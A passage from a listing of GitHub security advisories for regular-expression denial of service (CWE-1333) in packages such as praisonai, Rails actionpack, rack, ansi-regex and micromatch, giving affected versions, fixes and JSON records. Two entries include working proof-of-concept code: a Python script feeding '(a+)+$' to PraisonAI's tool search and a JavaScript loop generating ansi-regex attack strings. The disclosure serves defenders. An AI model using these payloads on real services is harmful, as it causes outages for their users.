CWE-1333
AllowedInefficient Regular Expression Complexity
Abstraction: Base · Status: Draft
The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.
725 vulnerabilities reference this CWE, most recent first.
GHSA-8W9J-HC3G-3G7F
Vulnerability from github – Published: 2026-04-01 23:21 – Updated: 2026-04-06 22:54Summary
MCPToolIndex.search_tools() compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the re engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.
Details
tool_index.py:365 (source) -> tool_index.py:368 (sink)
# source -- query taken directly from caller, no validation
def search_tools(self, query: str) -> List[ToolInfo]:
import re
# sink -- compiled and applied with no timeout or exception handling
pattern = re.compile(query, re.IGNORECASE)
for tool in self.get_all_tools():
if pattern.search(tool.name) or pattern.search(tool.hint):
matches.append(tool)
PoC
# tested on: praisonai==1.5.87 (source install)
# install: pip install -e src/praisonai
import sys, time, json
sys.path.insert(0, 'src/praisonai')
from pathlib import Path
mcp_dir = Path.home() / '.praison' / 'mcp' / 'servers' / 'test_server'
mcp_dir.mkdir(parents=True, exist_ok=True)
(mcp_dir / '_index.json').write_text(json.dumps([
{"name": "a" * 30 + "!", "hint": "a" * 30 + "!", "server": "test_server"}
]))
(mcp_dir / '_status.json').write_text(json.dumps({
"server": "test_server", "available": True, "auth_required": False,
"last_sync": time.time(), "tool_count": 1, "error": None
}))
from praisonai.mcp_server.tool_index import MCPToolIndex
index = MCPToolIndex()
start = time.monotonic()
results = index.search_tools("(a+)+$")
print(f"Returned in {time.monotonic() - start:.1f}s")
# expected output: Returned in 376.0s
Impact
A single crafted query blocks the Python thread for hundreds of seconds, causing a complete service outage for the duration. The MCP server HTTP transport runs without an API key by default, making this reachable by any attacker on the network. Repeated requests sustain the DoS indefinitely.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.5.89"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.90"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34939"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T23:21:08Z",
"nvd_published_at": "2026-04-03T23:17:06Z",
"severity": "MODERATE"
},
"details": "### Summary\n\n`MCPToolIndex.search_tools()` compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the `re` engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.\n\n### Details\n\n`tool_index.py:365` (source) -\u003e `tool_index.py:368` (sink)\n```python\n# source -- query taken directly from caller, no validation\ndef search_tools(self, query: str) -\u003e List[ToolInfo]:\n import re\n\n# sink -- compiled and applied with no timeout or exception handling\n pattern = re.compile(query, re.IGNORECASE)\n for tool in self.get_all_tools():\n if pattern.search(tool.name) or pattern.search(tool.hint):\n matches.append(tool)\n```\n\n### PoC\n```python\n# tested on: praisonai==1.5.87 (source install)\n# install: pip install -e src/praisonai\nimport sys, time, json\nsys.path.insert(0, \u0027src/praisonai\u0027)\nfrom pathlib import Path\n\nmcp_dir = Path.home() / \u0027.praison\u0027 / \u0027mcp\u0027 / \u0027servers\u0027 / \u0027test_server\u0027\nmcp_dir.mkdir(parents=True, exist_ok=True)\n(mcp_dir / \u0027_index.json\u0027).write_text(json.dumps([\n {\"name\": \"a\" * 30 + \"!\", \"hint\": \"a\" * 30 + \"!\", \"server\": \"test_server\"}\n]))\n(mcp_dir / \u0027_status.json\u0027).write_text(json.dumps({\n \"server\": \"test_server\", \"available\": True, \"auth_required\": False,\n \"last_sync\": time.time(), \"tool_count\": 1, \"error\": None\n}))\n\nfrom praisonai.mcp_server.tool_index import MCPToolIndex\nindex = MCPToolIndex()\n\nstart = time.monotonic()\nresults = index.search_tools(\"(a+)+$\")\nprint(f\"Returned in {time.monotonic() - start:.1f}s\")\n# expected output: Returned in 376.0s\n```\n\n### Impact\n\nA single crafted query blocks the Python thread for hundreds of seconds, causing a complete service outage for the duration. The MCP server HTTP transport runs without an API key by default, making this reachable by any attacker on the network. Repeated requests sustain the DoS indefinitely.",
"id": "GHSA-8w9j-hc3g-3g7f",
"modified": "2026-04-06T22:54:16Z",
"published": "2026-04-01T23:21:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8w9j-hc3g-3g7f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34939"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI Has ReDoS via Unvalidated User-Controlled Regex in MCPToolIndex.search_tools()"
}
GHSA-8X6C-CV3V-VP6G
Vulnerability from github – Published: 2023-02-11 00:13 – Updated: 2023-02-14 02:40This advisory is withdawn.
cacheable-request depends on http-cache-semanttics, which contains an Inefficient Regular Expression Complexity in versions prior to 4.1.1 of that package. cacheable-request has been updated to rely on the fixed version in 10.2.7.
Summary of http-cache-semantics vulnerability
http-cache semantics contains an Inefficient Regular Expression Complexity , leading to Denial of Service. This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.
Details
https://github.com/advisories/GHSA-rc47-6667-2j5j
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "cacheable-request"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.2.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2023-02-11T00:13:31Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## This advisory is withdawn.\n\ncacheable-request depends on http-cache-semanttics, which contains an Inefficient Regular Expression Complexity in versions prior to 4.1.1 of that package. cacheable-request has been updated to rely on the fixed version in 10.2.7. \n\n### Summary of http-cache-semantics vulnerability\nhttp-cache semantics contains an Inefficient Regular Expression Complexity , leading to Denial of Service. This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.\n\n### Details\nhttps://github.com/advisories/GHSA-rc47-6667-2j5j\n\n",
"id": "GHSA-8x6c-cv3v-vp6g",
"modified": "2023-02-14T02:40:00Z",
"published": "2023-02-11T00:13:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jaredwray/cacheable-request/security/advisories/GHSA-8x6c-cv3v-vp6g"
},
{
"type": "WEB",
"url": "https://github.com/jaredwray/cacheable-request/commit/8a47777e4eb61960469873cf4b3a2823742fc15e"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-rc47-6667-2j5j"
},
{
"type": "PACKAGE",
"url": "https://github.com/jaredwray/cacheable-request"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Withdrawn: cacheable-request depends on http-cache-semantics, which is vulnerable to Regular Expression Denial of Service",
"withdrawn": "2023-02-14T02:40:00Z"
}
GHSA-8XWW-X3G3-6JCV
Vulnerability from github – Published: 2023-01-18 18:20 – Updated: 2025-03-31 13:23There is a possible regular expression based DoS vulnerability in Action Dispatch related to the If-None-Match header. This vulnerability has been assigned the CVE identifier CVE-2023-22795.
Versions Affected: All Not affected: None Fixed Versions: 5.2.8.15 (Rails LTS), 6.1.7.1, 7.0.4.1
Impact
A specially crafted HTTP If-None-Match header can cause the regular expression engine to enter a state of catastrophic backtracking, when on a version of Ruby below 3.2.0. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability All users running an affected release should either upgrade or use one of the workarounds immediately. Releases
The FIXED releases are available at the normal locations. Workarounds
We recommend that all users upgrade to one of the FIXED versions. In the meantime, users can mitigate this vulnerability by using a load balancer or other device to filter out malicious If-None-Match headers before they reach the application.
Users on Ruby 3.2.0 or greater are not affected by this vulnerability. Patches
To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.
6-1-Avoid-regex-backtracking-on-If-None-Match-header.patch - Patch for 6.1 series
7-0-Avoid-regex-backtracking-on-If-None-Match-header.patch - Patch for 7.0 series
Please note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "actionpack"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0.beta1"
},
{
"fixed": "6.1.7.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "actionpack"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.0.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-22795"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-18T18:20:51Z",
"nvd_published_at": "2023-02-09T20:15:00Z",
"severity": "LOW"
},
"details": "There is a possible regular expression based DoS vulnerability in Action Dispatch related to the If-None-Match header. This vulnerability has been assigned the CVE identifier CVE-2023-22795.\n\nVersions Affected: All Not affected: None Fixed Versions: 5.2.8.15 (Rails LTS), 6.1.7.1, 7.0.4.1\n\nImpact\n\nA specially crafted HTTP If-None-Match header can cause the regular expression engine to enter a state of catastrophic backtracking, when on a version of Ruby below 3.2.0. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability All users running an affected release should either upgrade or use one of the workarounds immediately.\nReleases\n\nThe FIXED releases are available at the normal locations.\nWorkarounds\n\nWe recommend that all users upgrade to one of the FIXED versions. In the meantime, users can mitigate this vulnerability by using a load balancer or other device to filter out malicious If-None-Match headers before they reach the application.\n\nUsers on Ruby 3.2.0 or greater are not affected by this vulnerability.\nPatches\n\nTo aid users who aren\u2019t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n 6-1-Avoid-regex-backtracking-on-If-None-Match-header.patch - Patch for 6.1 series\n 7-0-Avoid-regex-backtracking-on-If-None-Match-header.patch - Patch for 7.0 series\n\nPlease note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.",
"id": "GHSA-8xww-x3g3-6jcv",
"modified": "2025-03-31T13:23:06Z",
"published": "2023-01-18T18:20:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22795"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails/commit/8d82687f3b04b2803320b64f985308239a8c3d2f"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails/commit/8dc45950619a4c64d16fb9370570c996d201f9b0"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails/commit/cd461c3e64e09cdcb1e379d1c35423c5e2caa592"
},
{
"type": "WEB",
"url": "https://discuss.rubyonrails.org/t/cve-2023-22795-possible-redos-based-dos-vulnerability-in-action-dispatch/82118"
},
{
"type": "PACKAGE",
"url": "https://github.com/rails/rails"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails/releases/tag/v6.1.7.1"
},
{
"type": "WEB",
"url": "https://github.com/rails/rails/releases/tag/v7.0.4.1"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2023-22795.yml"
},
{
"type": "WEB",
"url": "https://rubyonrails.org/2023/1/17/Rails-Versions-6-0-6-1-6-1-7-1-7-0-4-1-have-been-released"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "ReDoS based DoS vulnerability in Action Dispatch"
}
GHSA-9242-6P36-6256
Vulnerability from github – Published: 2023-10-25 18:32 – Updated: 2023-10-30 19:58ReDos in NPMJS Node Email Check v.1.0.4 allows an attacker to cause a denial of service via a crafted string to the scpSyntax component.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-email-check"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-39619"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-30T19:58:53Z",
"nvd_published_at": "2023-10-25T18:17:29Z",
"severity": "HIGH"
},
"details": "ReDos in NPMJS Node Email Check v.1.0.4 allows an attacker to cause a denial of service via a crafted string to the scpSyntax component.\n\n",
"id": "GHSA-9242-6p36-6256",
"modified": "2023-10-30T19:58:53Z",
"published": "2023-10-25T18:32:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39619"
},
{
"type": "WEB",
"url": "https://github.com/teomantuncer/node-email-check/issues/2"
},
{
"type": "WEB",
"url": "https://gist.github.com/6en6ar/712a4c1eab0324f15e09232c77ea08f8"
},
{
"type": "PACKAGE",
"url": "https://github.com/teomantuncer/node-email-check"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/node-email-check"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Inefficient Regular Expression Complexity in node-email-check"
}
GHSA-9356-575X-2W9M
Vulnerability from github – Published: 2025-08-06 12:31 – Updated: 2025-08-06 18:15A Regular Expression Denial of Service (ReDoS) vulnerability exists in the Hugging Face Transformers library, specifically in the convert_tf_weight_name_to_pt_weight_name() function. This function, responsible for converting TensorFlow weight names to PyTorch format, uses a regex pattern /[^/]*___([^/]*)/ that can be exploited to cause excessive CPU consumption through crafted input strings due to catastrophic backtracking. The vulnerability affects versions up to 4.51.3 and is fixed in version 4.53.0. This issue can lead to service disruption, resource exhaustion, and potential API service vulnerabilities, impacting model conversion processes between TensorFlow and PyTorch formats.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "transformers"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.53.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-5197"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-06T18:15:19Z",
"nvd_published_at": "2025-08-06T12:15:26Z",
"severity": "MODERATE"
},
"details": "A Regular Expression Denial of Service (ReDoS) vulnerability exists in the Hugging Face Transformers library, specifically in the `convert_tf_weight_name_to_pt_weight_name()` function. This function, responsible for converting TensorFlow weight names to PyTorch format, uses a regex pattern `/[^/]*___([^/]*)/` that can be exploited to cause excessive CPU consumption through crafted input strings due to catastrophic backtracking. The vulnerability affects versions up to 4.51.3 and is fixed in version 4.53.0. This issue can lead to service disruption, resource exhaustion, and potential API service vulnerabilities, impacting model conversion processes between TensorFlow and PyTorch formats.",
"id": "GHSA-9356-575x-2w9m",
"modified": "2025-08-06T18:15:19Z",
"published": "2025-08-06T12:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5197"
},
{
"type": "WEB",
"url": "https://github.com/huggingface/transformers/commit/701caef704e356dc2f9331cc3fd5df0eccb4720a"
},
{
"type": "WEB",
"url": "https://github.com/huggingface/transformers/commit/944b56000be5e9b61af8301aa340838770ad8a0b"
},
{
"type": "PACKAGE",
"url": "https://github.com/huggingface/transformers"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/3f8b3fd0-166b-46e7-b60f-60dd9d2678bf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Hugging Face Transformers Regular Expression Denial of Service (ReDoS) vulnerability"
}
GHSA-93PM-5P5F-3GHX
Vulnerability from github – Published: 2023-01-18 18:24 – Updated: 2023-10-23 19:18There is a denial of service vulnerability in the Content-Disposition parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44571.
Versions Affected: >= 2.0.0 Not affected: None. Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.1, 3.0.0.1 Impact
Carefully crafted input can cause Content-Disposition header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. This header is used typically used in multipart parsing. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted. Releases
The fixed releases are available at the normal locations. Workarounds
There are no feasible workarounds for this issue. Patches
To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.
2-0-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 2.0 series
2-1-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 2.1 series
2-2-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 2.2 series
3-0-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 3.0 series
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.9.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.6.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0.0"
},
{
"fixed": "3.0.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-44571"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-18T18:24:40Z",
"nvd_published_at": "2023-02-09T20:15:00Z",
"severity": "LOW"
},
"details": "There is a denial of service vulnerability in the Content-Disposition parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44571.\n\nVersions Affected: \u003e= 2.0.0 Not affected: None. Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.1, 3.0.0.1\nImpact\n\nCarefully crafted input can cause Content-Disposition header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. This header is used typically used in multipart parsing. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\nReleases\n\nThe fixed releases are available at the normal locations.\nWorkarounds\n\nThere are no feasible workarounds for this issue.\nPatches\n\nTo aid users who aren\u2019t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n 2-0-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 2.0 series\n 2-1-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 2.1 series\n 2-2-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 2.2 series\n 3-0-Fix-ReDoS-vulnerability-in-multipart-parser - Patch for 3.0 series\n",
"id": "GHSA-93pm-5p5f-3ghx",
"modified": "2023-10-23T19:18:08Z",
"published": "2023-01-18T18:24:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-44571"
},
{
"type": "WEB",
"url": "https://discuss.rubyonrails.org/t/cve-2022-44571-possible-denial-of-service-vulnerability-in-rack-content-disposition-parsing/82126"
},
{
"type": "PACKAGE",
"url": "https://github.com/rack/rack"
},
{
"type": "WEB",
"url": "https://github.com/rack/rack/releases/tag/v3.0.4.1"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2022-44571.yml"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2023/dsa-5530"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Denial of Service Vulnerability in Rack Content-Disposition parsing"
}
GHSA-93Q8-GQ69-WQMW
Vulnerability from github – Published: 2021-09-20 20:20 – Updated: 2023-09-11 16:42ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.
Proof of Concept
import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
ansiRegex().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "ansi-regex"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "ansi-regex"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "ansi-regex"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "ansi-regex"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-3807"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-697"
],
"github_reviewed": true,
"github_reviewed_at": "2021-09-20T18:56:22Z",
"nvd_published_at": "2021-09-17T07:15:00Z",
"severity": "HIGH"
},
"details": "ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.\n\n**Proof of Concept**\n```js\nimport ansiRegex from \u0027ansi-regex\u0027;\nfor(var i = 1; i \u003c= 50000; i++) {\n var time = Date.now();\n var attack_str = \"\\u001B[\"+\";\".repeat(i*10000);\n ansiRegex().test(attack_str)\n var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\n}\n```\nThe ReDOS is mainly due to the sub-patterns `[[\\\\]()#;?]*` and `(?:;[-a-zA-Z\\\\d\\\\/#\u0026.:=?%@~_]*)*`",
"id": "GHSA-93q8-gq69-wqmw",
"modified": "2023-09-11T16:42:11Z",
"published": "2021-09-20T20:20:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807"
},
{
"type": "WEB",
"url": "https://github.com/chalk/ansi-regex/issues/38#issuecomment-924086311"
},
{
"type": "WEB",
"url": "https://github.com/chalk/ansi-regex/issues/38#issuecomment-925924774"
},
{
"type": "WEB",
"url": "https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1"
},
{
"type": "WEB",
"url": "https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a"
},
{
"type": "WEB",
"url": "https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9"
},
{
"type": "WEB",
"url": "https://github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde8"
},
{
"type": "WEB",
"url": "https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908"
},
{
"type": "PACKAGE",
"url": "https://github.com/chalk/ansi-regex"
},
{
"type": "WEB",
"url": "https://github.com/chalk/ansi-regex/releases/tag/v6.0.1"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20221014-0002"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Inefficient Regular Expression Complexity in chalk/ansi-regex"
}
GHSA-94CM-J3MF-Q873
Vulnerability from github – Published: 2025-06-09 21:30 – Updated: 2025-06-09 21:30A vulnerability was found in Metabase 54.10. It has been classified as problematic. This affects the function parseDataUri of the file frontend/src/metabase/lib/dom.js. The manipulation leads to inefficient regular expression complexity. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The patch is named 4454ebbdc7719016bf80ca0f34859ce5cee9f6b0. It is recommended to apply a patch to fix this issue.
{
"affected": [],
"aliases": [
"CVE-2025-5895"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-09T20:15:25Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in Metabase 54.10. It has been classified as problematic. This affects the function parseDataUri of the file frontend/src/metabase/lib/dom.js. The manipulation leads to inefficient regular expression complexity. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The patch is named 4454ebbdc7719016bf80ca0f34859ce5cee9f6b0. It is recommended to apply a patch to fix this issue.",
"id": "GHSA-94cm-j3mf-q873",
"modified": "2025-06-09T21:30:51Z",
"published": "2025-06-09T21:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5895"
},
{
"type": "WEB",
"url": "https://github.com/metabase/metabase/pull/57011"
},
{
"type": "WEB",
"url": "https://github.com/metabase/metabase/pull/57011#pullrequestreview-2792664135"
},
{
"type": "WEB",
"url": "https://github.com/metabase/metabase/commit/4454ebbdc7719016bf80ca0f34859ce5cee9f6b0"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.311667"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.311667"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.585795"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-952P-6RRQ-RCJV
Vulnerability from github – Published: 2024-05-14 18:30 – Updated: 2024-08-28 13:12The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "micromatch"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-4067"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-21T22:58:52Z",
"nvd_published_at": "2024-05-14T15:42:47Z",
"severity": "MODERATE"
},
"details": "The NPM package `micromatch` prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn\u0027t find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won\u0027t start backtracking the regular expression due to greedy matching.\n",
"id": "GHSA-952p-6rrq-rcjv",
"modified": "2024-08-28T13:12:26Z",
"published": "2024-05-14T18:30:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4067"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/micromatch/issues/243"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/micromatch/pull/247"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/micromatch/pull/266"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/micromatch/commit/03aa8052171e878897eee5d7bb2ae0ae83ec2ade"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/micromatch/commit/500d5d6f42f0e8dfa1cb5464c6cb420b1b6aaaa0"
},
{
"type": "WEB",
"url": "https://advisory.checkmarx.net/advisory/CVE-2024-4067"
},
{
"type": "WEB",
"url": "https://devhub.checkmarx.com/cve-details/CVE-2024-4067"
},
{
"type": "PACKAGE",
"url": "https://github.com/micromatch/micromatch"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/micromatch/releases/tag/4.0.8"
}
